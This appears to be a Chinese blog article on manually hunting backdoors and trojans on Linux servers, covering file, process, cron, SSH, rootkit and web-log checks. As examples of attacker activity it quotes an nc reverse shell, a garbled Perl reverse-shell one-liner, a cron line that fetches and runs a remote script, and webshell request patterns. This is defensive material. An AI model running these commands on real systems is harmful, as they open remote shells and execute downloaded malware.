当前位置: 首页 > news >正文

手工排查后门木马的常用姿势

news 2025/9/2 16:37:23

声明!本文章所有的工具分享仅仅只是供大家学习交流为主,切勿用于非法用途,如有任何触犯法律的行为,均与本人及团队无关!!!

1. 检查异常文件

(1)查找最近修改的文件

# 查找最近3天内被修改的文件(重点检查Web目录)
find /var/www/ -type f -mtime -3 -ls | sort -k8

● 重点关注:.php、.jsp、.asp、.sh 等可执行文件。


● 隐藏文件:检查 /tmp/、/dev/shm/ 等临时目录。

(2)查找可疑文件名

# 查找包含常见后门特征的文件名
find / -name "*shell*" -o -name "*backdoor*" -o -name "*b374k*" -o -name "*c99*" -ls

● 常见WebShell:shell.php、b374k.php、c99.php、wso.php。

● 隐藏技巧:攻击者可能使用 …gif.php 伪装成图片。

(3)查找大文件(可能含加密数据)

find / -type f -size +5M -exec ls -lh {} \; | grep -v "log\|cache"

● 异常大文件:可能是攻击者存放的加密数据或恶意代码。

2. 检查异常进程

(1)查看运行中的可疑进程

ps aux | grep -E "(sh|bash|perl|python|nc|ncat|socat|wget|curl|\.\/)"

● 常见后门进程:

● nc -lvp 4444 -e /bin/bash(反弹Shell)

● perl -e 'use Socket; i = " x . x . x . x " ; i="x.x.x.x"; i="x.x.x.x";p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));connect(S,sockaddr_in( p , i n e t a t o n ( p,inet_aton( p,inetaton(i)));open(STDIN,“>&S”);open(STDOUT,“>&S”);open(STDERR,“>&S”);exec(“/bin/sh -i”);

(2)检查隐藏进程

# 查看所有进程(包括无二进制文件的进程)
top -c

● 异常进程:无对应文件、占用高CPU、奇怪命令行参数。

(3)检查网络连接

netstat -antp | grep ESTABLISHED
ss -tulnp

● 可疑外联IP:连接到未知IP的 bash、sh、nc 进程。

3. 检查定时任务

(1)查看用户级定时任务

crontab -l

(2)检查系统级定时任务

ls -la /etc/cron.*
cat /etc/crontab

● 异常任务:如 wget http://x.x.x.x/malware.sh | sh。

4. 检查SSH后门

(1)查看SSH登录记录

cat /var/log/auth.log | grep "Accepted"
cat /var/log/secure | grep "Accepted"  # CentOS

● 异常登录:陌生IP、非工作时间登录。

(2)检查SSH密钥

ls -la ~/.ssh/authorized_keys

● 攻击者可能添加自己的公钥,实现免密登录。

(3)检查SSH配置文件

cat /etc/ssh/sshd_config | grep -E "(PermitRootLogin|AllowUsers|Port)"

● 异常配置:PermitRootLogin yes(应禁用root登录)

5. 检查内核级Rootkit

(1)检查系统调用劫持

strace -p <PID>  # 跟踪进程的系统调用

● 异常行为:如 open(“/etc/shadow”) 或 execve(“/bin/sh”)。

(2)使用专用工具检测

# 安装并运行Rootkit检测工具
sudo apt install rkhunter chkrootkit -y
sudo rkhunter --check
sudo chkrootkit

6. 检查Web日志

(1)查找可疑HTTP请求

cat /var/log/apache2/access.log | grep -E "(cmd=|eval|system|passthru|shell_exec)"

● 常见攻击特征:
○ GET /index.php?cmd=whoami
○ POST /upload.php -F “file=@shell.php”

(2)检查大流量IP

cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -nr | head -n 10

● 高频访问IP:可能是攻击者在扫描或爆破。

7.总结

http://www.dtcms.com/a/103207.html

相关文章:

  • C++之曲线拟合与离散点生成
  • ‌在 Fedora 系统下备份远程 Windows SQL Server 数据库的完整方案
  • Oracle数据库数据编程SQL<3.5 PL/SQL 存储过程(Procedure)>
  • JMeter进行分布式压测
  • 【力扣刷题实战】寻找数组的中心下标
  • Scala基础知识3
  • Kong网关研究
  • Android 中实现一个自定义的 AES 算法
  • 【SPP】深入解析蓝牙 L2CAP 协议在SPP中的互操作性要求 —— 构建可靠的蓝牙串口通信基础
  • CF每日5题(1400)
  • 关于微信小程序云开发,上传数据库时--数据异常问题
  • 从零构建大语言模型全栈开发指南:第四部分:工程实践与部署-4.1.2ONNX格式转换与TensorRT部署
  • 数据库部署在服务器表不存在解决方案
  • LVS负载均衡集群
  • 跨域问题解决
  • 【Linux】进程的详讲(中上)
  • 蓝桥杯数学知识
  • 20250331-智谱-沉思
  • 蓝桥杯备赛之枚举
  • 在Windows Server上安装和配置MinIO对象存储服务
  • PyTorch量化进阶教程:第三章 A 股数据处理与特征工程
  • 以太坊DApp开发脚手架:Scaffold-ETH 2 详细介绍与搭建教程
  • Spring Boot 2.x 与 Nacos 整合规范指南
  • 函数:static和extern
  • 3 通过图形化方式创建helloworld
  • QML输入控件: TextField(文本框)的样式定制
  • 408 计算机网络 知识点记忆(3)
  • mysql JSON_ARRAYAGG联合JSON_OBJECT使用查询整合(数组对象)字段
  • “钉耙编程”2025春季联赛(2)题解(更新中)
  • 在 Cloud Run 上使用 Gemini API 构建聊天应用